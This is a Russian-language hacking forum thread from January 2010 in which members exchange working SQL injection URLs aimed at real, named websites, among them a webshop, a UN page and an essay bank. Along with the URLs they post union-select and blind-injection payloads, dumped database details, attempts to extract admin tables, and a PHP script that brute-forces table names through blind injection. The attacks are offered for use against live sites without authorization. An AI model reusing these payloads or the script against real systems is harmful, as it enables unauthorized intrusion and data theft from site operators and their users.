HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #11061  
Старый 03.01.2010, 18:25
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Цитата:
Сообщение от Stalingrad  
http://www.arctic-cooling.com/webshop/index.php?shop_id=11+union+select+1,2,null--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_45+and+1=1--
http://www.arctic-cooling.com/catalog/product_info.php?cPath=41_44&mID=26544+group+by+19--

version(): 4.0.27-standard
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(

Jerri,

http://www.un.org/sg/articleFullsearch.asp?TID=1+or+1=(select+top+1+fai ledemailaddress+from+newsadmin.failedemails)--+
 
Ответить с цитированием

  #11062  
Старый 03.01.2010, 18:51
ElteRUS
Постоянный
Регистрация: 11.10.2007
Сообщений: 406
С нами: 9780227

Репутация: 1423
По умолчанию

Нашел =)

http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
 
Ответить с цитированием

  #11063  
Старый 03.01.2010, 20:35
Jerri
Участник форума
Регистрация: 12.07.2009
Сообщений: 158
С нами: 8859263

Репутация: 334
По умолчанию

ElteRUS,спс.
 
Ответить с цитированием

  #11064  
Старый 03.01.2010, 21:29
Stalingrad
Познающий
Регистрация: 18.03.2006
Сообщений: 47
С нами: 10605234

Репутация: 9
По умолчанию

Цитата:
Сообщение от ElteRUS  
Плохо. Ищи скулю с 'классическим' выводом через юнион+селект. Я посмотрел по первой ссылке - там параметр подставляется в несколько запросов. Не могу поковырять, жутко лажет нет =(
А мне вот интересно всетаки,можно ли чтото сделать именно с первой ссылкой там где параметр подставляется в несколько запросов.Просто есть тема на античате https://forum.antichat.ru/showpost.php?p=1047720&postcount=74

Там вот похожий случай,я пытался и так но не получалось.А за то что нашел спасибо , теперь надо подобрать колонки к таблице admin, но ниче не выходит.Может они на немецком/швейцарском
 
Ответить с цитированием

  #11065  
Старый 03.01.2010, 22:32
Nightmarе
Познавший АНТИЧАТ
Регистрация: 29.04.2007
Сообщений: 1,189
С нами: 10018169

Репутация: 1680


По умолчанию

Цитата:
Сообщение от ElteRUS  
Нашел =)

http://www.arctic-cooling.com/catalog/tips_and_tricks.php?tPath=7&aID=-521+union+select+1,2,3,user(),5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,19--+
Вирус, товарщь!
 
Ответить с цитированием

  #11066  
Старый 04.01.2010, 05:07
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами: 10695206

Репутация: 245
По умолчанию

вопрос! нашел слепую скуль на одном с порталов одного очень популярного ресурса!
Возникают сразу два вопроса:
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
2. Возникла проблема в переборе!

Юзаю такой запрос:
Код:
+and+(select+lower(substring(user(),1,1))+from+information_schema.tables+limit+0,1)='a'
Написал скрипт аналогов которому море,
PHP код:
<form method="post">
<input type="type" name="url" value="http://.html?h=15" size="150">
limit <input type="type" name="ntab" value="17" size="1">,1
<input type="submit" name="start" value="Start" style="cursor:pointer">
</form>

<?
$brutelist 
="qwertyuiopasdfghjklzxcvbnm1234567890_";
//$brutelist ="qwertyuiopasdfghjklzxcvbnm1234567890_+!@#\$%^&*\ '\"()";
$word '<div class="clear mb25">'//
$url=$_POST['url']; //
$ntab=$_POST['ntab'];

if(
$_POST['start']){
    for(
$i=1;$i<=10;$i++){ // Позиція символа перебираємої таблиці
        
for($j=0;$j<strlen($brutelist);$j++){ // Перебирання символа
            
$linkout=@file_get_contents($url."+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+".$ntab.",1)='".$brutelist[$j]."'");
            
preg_match_all($word,$linkout,$out);
            if(!
$out[0][0]==""){
                
//echo "<br>".$i."[".$brutelist[$j]."] http://.html?h=15+and+(select+lower(substring(table_name,".$i.",1))+from+information_schema.tables+limit+17,1)='".$brutelist[$j]."'";
                
$fp=fopen("_.txt","a+"); 
                
fwrite($fp,$brutelist[$j]);
                
fclose($fp);
            }
            
        }
    }
}
?>
проблема долго юзать перебирать и все такое.. есть альтернатива.?
читал статью _http://www.xakep.ru/post/49697/default.asp
ошибок нет, ascii не разрешено юзать, ничего не выводит.
Жду похорошо професионального ответа.

Последний раз редактировалось Micr0b; 04.01.2010 в 05:10..
 
Ответить с цитированием

  #11067  
Старый 04.01.2010, 06:48
warlok
Постоянный
Регистрация: 18.02.2008
Сообщений: 368
С нами: 9594385

Репутация: 386
По умолчанию

Цитата:
1. Какая вероятность того что уязвимый ресурс стоит на том же сервере что и популярный портал.. ?
reserse ip ?
 
Ответить с цитированием

  #11068  
Старый 04.01.2010, 14:49
Micr0b
Участник форума
Регистрация: 14.01.2006
Сообщений: 242
С нами: 10695206

Репутация: 245
По умолчанию

ну да чото забыл)
Кстати проверил mail.ru выдал:
Inbox.ru
Mail.ru
Porsche924.ru

Тоже самое когда *.mail.ru
Для болие точного результату спрошу, тоисть отрицательный?
 
Ответить с цитированием

  #11069  
Старый 04.01.2010, 18:14
гаррет-тень
Познающий
Регистрация: 21.12.2009
Сообщений: 34
С нами: 8625696

Репутация: 1
По умолчанию

я в html файле пишу <script>...</script>, а <html><head><title><bodyl><head><title><body> Писать?> Писать?
 
Ответить с цитированием

  #11070  
Старый 04.01.2010, 18:59
Pashkela
Динозавр
Регистрация: 10.01.2008
Сообщений: 2,841
С нами: 9649706

Репутация: 3338


По умолчанию

Цитата:
Сообщение от Strilo4ka  
если

кто хочет может поиграться банк рефератов!!!
класический вариант юнион + селект не проходит и с дупликатами тоже
Код:
http://www.bank-referatov.info/info.php?id=106+and+1=1+and+substring(version(),1,1)=5

@@basedir: /
@@tmpdir: /tmp/
database(): kupich_kur
@@datadir: /var/lib/mysql/
version(): 5.0.87-community
user(): kupich_Kupich@localhost
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.